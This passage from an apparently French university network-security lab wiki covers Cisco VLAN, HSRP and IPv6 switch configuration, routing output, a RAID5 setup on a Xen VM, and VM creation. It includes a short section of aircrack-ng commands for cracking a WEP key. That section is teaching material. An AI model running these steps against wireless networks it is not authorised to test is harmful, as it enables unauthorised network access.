 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
